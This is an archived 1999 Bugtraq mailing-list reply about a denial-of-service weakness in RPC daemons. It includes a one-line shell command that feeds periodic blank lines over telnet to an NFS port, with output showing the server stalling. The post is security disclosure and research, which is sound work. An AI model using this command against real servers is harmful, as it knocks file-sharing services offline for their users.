Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: KKIS.08041999.001.b - security raport - flaws in rpc part of

From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Thu, 15 Apr 1999 21:46:34 +0200

On Wed, Apr 14, 1999 at 03:26:14PM +0200, Lukasz Luzar wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                           ###  ###  ###  ###  ###
                           ### ###   ### ###   ###
                           ######    ######    ###
                           ### ###   ### ###   ###
                           ###  ###  ###  ###  ###

                               S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team                         Cracow Commercial Internet, Poland
http://www.security.kki.pl                http://www.kki.pl
mailto:security () security kki pl           mailto:biuro () kki pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Raport title        : Lack of RPC's implementation in libc libraries
                      and how it affects for example portmap.


A much easier DOS is obtained by connecting to an RPC port and just sending some random
(most will do) garbage every 5 seconds. Note that this _does_ affect the UDP services
in the same daemons. I have seen this bug in _every_ RPC implementation, with a few
exceptions: mcserv (which does not really use the RPC protocol, only the portmapper),
Sun's own nfsd [although their portmapper is buggy], and NetApp boxes.

To wit:
[root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049
Trying 10.10.13.1...
Connected to zopie.attic.vuurwerk.nl.
Escape character is '^]'.
NFS server zopie not responding, still trying.
Connection closed by foreign host.
[root@koek] ~# NFS server zopie OK.


Right after I started the telnet, I switched to another VC and did ls /zopie, the NFS
mounted disk. The ls did not give any output until I ctrl-C'ed the telnet.

Greetz, Peter
--
| 'He broke my heart,    |                              Peter van Dijk |
     I broke his neck'   |                     peter () attic vuurwerk nl |
   nognixz - As the sun  |        Hardbeat@ircnet - #cistron/#linux.nl |
                         | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
Previous By Date Next
Previous By Thread Next

Current thread: